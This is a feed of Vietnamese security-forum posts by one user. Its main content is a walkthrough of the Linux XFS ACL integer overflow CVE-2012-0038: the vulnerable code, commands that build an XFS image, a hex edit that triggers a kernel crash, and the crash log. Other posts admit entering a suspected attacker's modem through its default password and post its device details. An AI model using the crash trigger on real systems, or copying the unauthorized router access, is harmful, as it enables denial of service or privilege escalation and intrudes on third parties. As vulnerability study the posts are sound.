<![CDATA[Messages posted by "cr4zyb0y"]]> /hvaonline/posts/listByUser/221682.html JForum - http://www.jforum.net ai biết về trình biên dịch GCC /hvaonline/posts/preList/44156/273147.html#273147 /hvaonline/posts/preList/44156/273147.html#273147 GMT HVA News - Deep Web ( Web Ẩn ) là gì

idid231 wrote:
Vậy đối tượng hướng tới của Web Ẩn chỉ là những kẻ siêu tin học? Bởi có giỏi thì mới tìm thấy dạng web như vậy. Mà em cũng chưa hiểu loại web này phục vụ mục đích gì. Người quản trị thường muốn tăng rank cho site của mình, đằng này lại muốn Ẩn đi, chắc chỉ toàn mục đích đen tối. Các trang dạng "phải xác thực truy cập" không rõ là tiếp thị bằng cách nào để đem về nguồn thu nhỉ? Bởi em thấy porn thì nhiều trang bị crack acc lắm, bảo mật không cao thì khách chạy hết mất. 
Mục tiêu của Web Ẩn* là Ẩn, còn về đối tượng thì không có giới hạn. Ai có nhu cầu thì sử dụng thôi. Không cần giỏi mới tìm thấy, chỉ cần biết thì vào thôi. Vì là ẩn danh trên mạng này, nên các website trong mạng ẩn này hầu hết là phục vụ các dịch vụ như bán hacked credit card, các thể loại giải trí khiêu dâm, các dịch vụ hack thuê, còn có cả dịch vụ viết paper, tìm tài liệu thuê nữa =)). * mình chỉ nói phần web ẩn hướng tới tính ẩn danh của người dùng, phần lớn còn lại là các web nội bộ của doanh nghiệp, chính phủ, tổ chức ... thì không vào được nên không đề cập ở đây.]]>
/hvaonline/posts/preList/42557/264792.html#264792 /hvaonline/posts/preList/42557/264792.html#264792 GMT
Vietnamese Hacking Challenges /hvaonline/posts/preList/41795/260932.html#260932 /hvaonline/posts/preList/41795/260932.html#260932 GMT BkitSec Wargame /hvaonline/posts/preList/41215/259019.html#259019 /hvaonline/posts/preList/41215/259019.html#259019 GMT CVE-2012-0038: XFS ACL count integer overflow PoC Code:
STATIC struct posix_acl *
xfs_acl_from_disk(struct xfs_acl *aclp)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
struct xfs_acl_entry *ace;
int count, i;

count = be32_to_cpu(aclp->acl_cnt);

acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);

for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
...
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
...
}
return acl;
...
}
Trong posix_acl_alloc chúng ta có: Code:
struct posix_acl *
posix_acl_alloc(int count, gfp_t flags)
{
const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);
struct posix_acl *acl = kmalloc(size, flags);
if (acl)
posix_acl_init(acl, count);
return acl;
}
Như vậy biến count được khai báo là kiểu Interger. Biến size được tính toán dựa trên : Code:
const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);
Vấn đề xảy ra khi count quá lớn, dẫn tới phép toán này gây ra tràn số, size sẽ < count. Lúc này bộ nhớ được cấp phát sẽ nhỏ hơn thực tế mà chương trình sử dụng ở: Code:
for (i = 0; i < count; i++) {
......
Tử đây một lỗi tràn bộ đệm sẽ xảy ra. Kết quả là kernel panic hoặc có thể dẫn tới thực thi mã ( code execution ) ở mức kernel. Nếu hệ thống có hỗ trợ automount XFS file system, khi chúng ta chuẩn bị một đĩa USB với định dạng XFS với các thông số và mã khai thác phù hợp sẽ dẫn tới lấy quyền root ( vì module này chạy với quyền của kernel) hoặc ít nhất có thể làm crash hệ thống đó. Mình thấy bug này khá thú vị và nhân tiện cũng muốn hướng dẫn các bạn cách viết exploit cho kernel driver ( nhưng cái như local root mà các bạn hay xài). Trước tiên chúng ta tạo ra 1 xfs file system chuẩn: Code:
[root@vulnBox xfs]# dd if=/dev/zero of=expl bs=1M count=40
40+0 records in
40+0 records out
41943040 bytes (42 MB) copied, 0.0600407 s, 699 MB/s
[root@vulnBox xfs]# mkfs.xfs expl
meta-data=expl                   isize=256    agcount=2, agsize=5120 blks
=                       sectsz=512   attr=2, projid32bit=0
data     =                       bsize=4096   blocks=10240, imaxpct=25
=                       sunit=0      swidth=0 blks
naming   =version 2              bsize=4096   ascii-ci=0
log      =internal log           bsize=4096   blocks=1200, version=2
=                       sectsz=512   sunit=0 blks, lazy-count=1
realtime =none                   extsz=4096   blocks=0, rtextents=0
[root@vulnBox xfs]#
Tiếp theo, mount nó ra và tạo 1 file rồi thay đổi ACL cho nó( vì phần bị lỗi ở xfs_acl): Code:
[root@vulnBox xfs]# mount expl /mnt/tm/
[root@vulnBox xfs]# echo "coolExploit" > /mnt/tm/hellosuto
[root@vulnBox xfs]# setfacl -m u:user:rw- /mnt/tm/hellosuto
[root@vulnBox xfs]# getfattr -e hex -dm '.*' /mnt/tm/hellosuto
getfattr: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
security.selinux=0x756e636f6e66696e65645f753a6f626a6563745f723a66696c655f743a733000
system.posix_acl_access=0x0200000001000600ffffffff02000600e803000004000400ffffffff10000600ffffffff20000400ffffffff
trusted.SGI_ACL_FILE=0x0000000500000001ffffffff0006000000000002000003e80006000000000004ffffffff0004000000000010ffffffff0006000000000020ffffffff00040000

[root@vulnBox xfs]# getfacl  /mnt/tm/hellosuto
getfacl: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
# owner: root
# group: root
user::rw-
user:user:rw-
group::r--
mask::rw-
other::r--
Mở ra bằng 1 hex editor và thay đổi: Code:
0000DF60   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ................................
0000DF80   00 00 00 00  00 40 0C 53  47 49 5F 41  43 4C 5F 46  49 4C 45 00  00 00 05 00  00 00 01 FF  FF FF FF 00  .....@.SGI_ACL_FILE.............
Từ : 49 4C 45 00 00 00 05 49 4C 45 40 00 00 00 để chuyển số lượng ACL entry từ 5 sang 0×40000000. Và : Code:
[ 4107.439000] BUG: unable to handle kernel paging request at ffffffff
[ 4107.439015] IP: [<c04df18e>] __kmalloc+0x9d/0xff
[ 4107.439023] *pde = 00ffc067 *pte = 00000000
[ 4107.439023] Oops: 0000 [#1] SMP
[ 4107.439023] Modules linked in: xfs fcoe libfcoe 8021q garp stp llc lockd libfc scsi_transport_fc scsi_tgt ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 nf_conntrack_ipv4 nf_defrag_ipv4 ip6table_filter xt_state ip6_tables nf_conntrack ppdev snd_intel8x0 snd_ac97_codec ac97_bus snd_seq snd_seq_device parport_pc snd_pcm snd_timer snd soundcore joydev i2c_piix4 microcode i2c_core parport e1000 snd_page_alloc sunrpc uinput [last unloaded: scsi_wait_scan]
Như vậy chúng ta đã có sample để trigger bug này, phần tiếp theo các bạn có thể theo dõi ở : http://bkitsec.vn .]]>
/hvaonline/posts/preList/41517/257306.html#257306 /hvaonline/posts/preList/41517/257306.html#257306 GMT
BkitSec Wargame http://bkitsec.vn/?topic=1st-chal-targeted-attack-level-1 [Web 1st]Let's Hack http://bkitsec.vn/?topic=web-1stlets-hack]]> /hvaonline/posts/preList/41215/254418.html#254418 /hvaonline/posts/preList/41215/254418.html#254418 GMT BkitSec Wargame /hvaonline/posts/preList/41215/253905.html#253905 /hvaonline/posts/preList/41215/253905.html#253905 GMT BkitSec Wargame /hvaonline/posts/list/38052.html), hẳn các bạn đã từng đọc qua loạt bài dịch này của mod Ky0. Và các bạn cũng hình dung được trong đầu mình rằng : " à, khai thác lỗi phần mềm là thế đấy, thế đấy ...." . Nhưng vấn đề gặp phải ở hầu hết mọi người là môi trường thực nghiệm và chỗ trao đổi những vấn đề cụ thể trong quá trình các bạn tìm hiểu . Với mục đích hỗ trợ, và tạo môi trường cho các bạn cũng chia sẻ, nghiên cứu và thực hành. Tụi mình, nhóm BkitSec http://bkitsec.vn), đã quyết định tạo một diễn đàn nhỏ http://bkitsec.vn/?post_type=forum). Ở diễn đàn này, hằng tuần sẽ có các "thử thách" ra lò dưới dạng wargame để các bạn có thể luyện tập. Trong khi đó vẫn có thể trao đổi và học hỏi kinh nghiệm qua diễn đàn. Các "thử thách" sẽ đủ các chủng loại :
  • Tận dụng lỗi phần mềm (thường thấy nhất, là các ứng dụng chạy trên các hệ điều hành dòng *nix, windows ) Khai thác lỗi từ ứng dụng web Mã hóa Malware analysis ...
Và với sự hỗ trợ từ các đàn anh từ nhóm VNsecurity http://vnsecurity.net), tụi mình hi vọng sẽ tạo ra một sân chơi bổ ích cho các bạn hackers. P/S : Các kiến thức cơ bản và nền tảng về KHMT , các bạn vẫn có thể trao đổi ở diễn đàn, tụi mình rất vui khi được chia sẽ cùng các bạn. Cảm ơn mọi người.]]>
/hvaonline/posts/preList/41215/253896.html#253896 /hvaonline/posts/preList/41215/253896.html#253896 GMT
PullThePlug wargame /hvaonline/posts/preList/23615/253588.html#253588 /hvaonline/posts/preList/23615/253588.html#253588 GMT PullThePlug wargame /hvaonline/posts/preList/23615/253572.html#253572 /hvaonline/posts/preList/23615/253572.html#253572 GMT Thư viện Source vì Cộng đồng trên Hvaonline

quangteospk wrote:
Cá nhân mình cũng thấy điều này là không cần thiết. Tài liệu bạn search GG ra rất là nhiều, mọi người có thể dễ dàng làm điều này. Hơn nưa một số tài liệu của NhatNghe, VnPro, SaigonCTT thì cũng có "bản quyền" của họ, mà chính forum của họ cũng có share rồi. Còn nói về sách, trong HVA cũng có topic chia sẻ ebook tiếng Anh của một bạn nào đó rồi. Ai cần vô đó tìm kiếm thêm. Hơn nữa cái khẩu hiệu hô hào của bạn nghe rất "buồn cười". Bởi sách, tài liệu không phải là đồ chùa. Bạn có thể down ở một nguồn free nào đó, đọc nó, phục vụ cho mục đích của cá nhân bạn. Chứ đừng đem những thứ "chùa", "lậu" ra mà hô hào vì một tinh thần chia sẻ. Cá nhân mình thấy việc tìm kiếm tài liệu cũng "lòi" ra một số điểm hay ho. Việc một người học IT mà ko biết search GG là mệt rồi :D Vài dòng tâm sự.  
Chào bạn, thay vì chỉ ra điểm dở, thì sao lại không góp ý để loại bỏ những điểm dở đó nhỉ. Và cũng qua ý kiến của bạn, mình không thấy bạn có chút suy nghĩ nào cả. Đồng ý là tài liệu thì rất nhiều, tuy nhiên vấn đề tổng hợp và chọn lọc thì không phải ai cũng làm được. Và cái quan trọng hơn, là những tài liệu hay, đã được bạn đọc và chiêm nghiệm chẳng hạn, bạn giới thiệu lại cho những người khác thì phần giá trị của tài liệu ấy còn cao hơn nữa. Nói về vấn đề bản quyền thì cũng có rất nhiều cách giải quyết khác nhau : Thứ nhất, có rất nhiều tài liệu miễn phí và rất hay, rất cần được chia sẻ. Thứ hai, hệ thống chia sẻ này sẽ không chấp nhận "lưu trữ" bất kì tài liệu bản quyền nào, bạn có thể viết giới thiệu và cung cấp đường dẫn đến tài liệu. Và vì là do đóng góp của cộng đồng, trách nhiệm thuộc về mỗi thành viên chứ không phải là của hệ thống. Mình nghĩ cái hay nếu có hệ thống này, và hệ thống này hoạt động tốt, là ở chỗ nó phân loại và chuyên môn hóa được các tài liệu.]]>
/hvaonline/posts/preList/40860/251481.html#251481 /hvaonline/posts/preList/40860/251481.html#251481 GMT
Xin xem xét dùm bảo mật site rongchaua.net /hvaonline/posts/preList/39745/244770.html#244770 /hvaonline/posts/preList/39745/244770.html#244770 GMT RCE và vô hiệu hoá VB.NET virus (của STL à ?) /hvaonline/posts/preList/39504/243783.html#243783 /hvaonline/posts/preList/39504/243783.html#243783 GMT Gentoo vs Ubuntu, Fedora,.... /hvaonline/posts/preList/14729/243547.html#243547 /hvaonline/posts/preList/14729/243547.html#243547 GMT RCE và vô hiệu hoá VB.NET virus (của STL à ?)

exception wrote:
Nói đi nói lại, thực ra STL là người của ai thì mọi người cũng lờ mờ đoán ra rồi. Nhưng chẳng lẽ một nhóm được đầu tư tiền bạc, thời gian như thế mà lại làm ra các sản phẩm "gà mờ" như thế sao (qua các bài phân tích của anh TQN)? Có lẽ tiền của người đầu tư rơi nhầm chỗ rồi thì phải :lolz Nhưng thôi, quay lại chủ đề kỹ thuật, anh TQN cho em xin ít mẫu xem nào. Sẵn tiện đang free không có gì phải làm đây.  
bác đoán là ai vậy, em thì chịu. còn chiện vung tiền, đầu tư nhìu mà sản phẩm gà mờ như bác nói thì ngoài đường thiếu gì, hay là bác hiện không ở VN :-?]]>
/hvaonline/posts/preList/39504/243505.html#243505 /hvaonline/posts/preList/39504/243505.html#243505 GMT
RCE và vô hiệu hoá VB.NET virus (của STL à ?)

mv1098 wrote:

TQN wrote:
Cảm ơn anh conmale đã lên tiếng. Bà con đừng hùa nhau vào chửi rũa tohoangvu. Biết đâu chính tohoangvu cũng là nạn nhân của STL hay ai khác thì sao. Cái thằng giấu mặt là thằng này nè: 123.21.140.237 
TQN không hiểu vấn đề hay là vờ không hiểu để chọc mình :( cái ip 192.168.x.x là cái ip modem cấp cho các máy client cắm vào nó ( ip LAN ), còn cái ip 123.21.140.237 là do ISP cấp cho modem của khách hàng khi kết nối vào internet ( ip WAN ) Mà các thuê bao ADSL thường là IP động chứ không phải ip tĩnh nên khi reset modem thì ISP sẽ cũng cấp 1 ip mới chứ không phải ip cũ nữa. Bác truy cập vào trang http://checkmyip.com/ xem ip của mình là gì, sau đó reset modem, clear cache của trình duyệt rồi vào lại trang đó bác sẽ thấy ip thay đổi ps: lúc đầu bác vào check port có để ý nó là modem Zoom X5 không, giờ nó là modem TP-Link khác hoàn toàn, không lẽ anh ta thay luôn cả modem  
không đọc những gì mình viết trên kia à, mình có nói rỏ ràng 2 giả thiết nếu ip 123.21.140.237 đã/chưa assign cho thèn khác thì tình huống sẽ khác mà. còn vi phạm pháp luật mẹ gì mình không care, vì mấy anh công an mạng chả quan tâm gì tới mấy cái mình làm đâu =)) , nếu có thì đập tụi STL có ích hơn. tội phát tán malware là đi tù như chơi ấy chứ nhỉ =))]]>
/hvaonline/posts/preList/39504/243181.html#243181 /hvaonline/posts/preList/39504/243181.html#243181 GMT
RCE và vô hiệu hoá VB.NET virus (của STL à ?)

TQN wrote:
Hì hì, vậy là cái modem của cậu ngokiennam này đặt default pasword rồi, phải không cr4zyb0y ? Còn cái tên wujianan này nữa, đặc sệt tàu khựa ! 
default anh, em đổi nó rồi, nếu ai cần thì pri message cho mình. nếu giả thiết của em về ip đó đã assign cho 1 user khác, không phải của tụi STL thì cũng không có gì khai thác, ngược lại thì chém thôi ;))]]>
/hvaonline/posts/preList/39504/243169.html#243169 /hvaonline/posts/preList/39504/243169.html#243169 GMT
RCE và vô hiệu hoá VB.NET virus (của STL à ?) /hvaonline/posts/preList/39504/243162.html#243162 /hvaonline/posts/preList/39504/243162.html#243162 GMT RCE và vô hiệu hoá VB.NET virus (của STL à ?) Device Information Firmware Version : 1.0.2 Build 080513 Rel.58514 MAC Address : 00:23:cd:c8:95:50  lúc mình vào thì có 1 cái máy đang sài là
wujianan-PC 192.168.1.100 00-24-1D-88-E4-79 


còn đây là hai cái video : http://www.mediafire.com/?znh340c70id3jac còn tohoangvu có bị mất mail không thì không biết. vì mình sms với ảnh thì ảnh nói là "are you hacker my email", nhưng mình hỏi là email nào thì ảnh lại lờ đi ... ]]>
/hvaonline/posts/preList/39504/243159.html#243159 /hvaonline/posts/preList/39504/243159.html#243159 GMT
RCE và vô hiệu hoá VB.NET virus (của STL à ?) /hvaonline/posts/preList/39504/243156.html#243156 /hvaonline/posts/preList/39504/243156.html#243156 GMT RCE và vô hiệu hoá VB.NET virus (của STL à ?) /hvaonline/posts/preList/39504/243079.html#243079 /hvaonline/posts/preList/39504/243079.html#243079 GMT Liệu Instant Messenger có đáng tin cậy? /hvaonline/posts/preList/39238/241259.html#241259 /hvaonline/posts/preList/39238/241259.html#241259 GMT Hỏi cách post 1 bải lên 1 diễn vBulletin bằng Python http://docs.python.org/library/cookielib.html nữa.
Bạn thử để trống vb_login_md5password và vb_login_md5password_utf (hoặc bỏ hẳn, không định nghĩa hai trường đó trong dict luôn), ngoài ra điền username và password (chưa mã hóa) của bạn vào vb_login_username và vb_login_password xem sao.  
vbb nó có cái javascript md5 cái pass rồi mới gửi lên server xử lý tiếp đó anh iu ^^ .]]>
/hvaonline/posts/preList/39058/239632.html#239632 /hvaonline/posts/preList/39058/239632.html#239632 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/preList/38818/238302.html#238302 /hvaonline/posts/preList/38818/238302.html#238302 GMT Có nên dùng BKAV? /hvaonline/posts/preList/38367/237968.html#237968 /hvaonline/posts/preList/38367/237968.html#237968 GMT Những cuốn sách bạn đang đọc ? /hvaonline/posts/preList/28765/235048.html#235048 /hvaonline/posts/preList/28765/235048.html#235048 GMT From Patch to Proof-of-Concept: MS10-081 /hvaonline/posts/preList/37946/233302.html#233302 /hvaonline/posts/preList/37946/233302.html#233302 GMT side-channel attacks /hvaonline/posts/preList/37398/232175.html#232175 /hvaonline/posts/preList/37398/232175.html#232175 GMT Sir Alex Conmale và thế hệ vàng /hvaonline/posts/preList/37730/232172.html#232172 /hvaonline/posts/preList/37730/232172.html#232172 GMT side-channel attacks /hvaonline/posts/preList/37398/230639.html#230639 /hvaonline/posts/preList/37398/230639.html#230639 GMT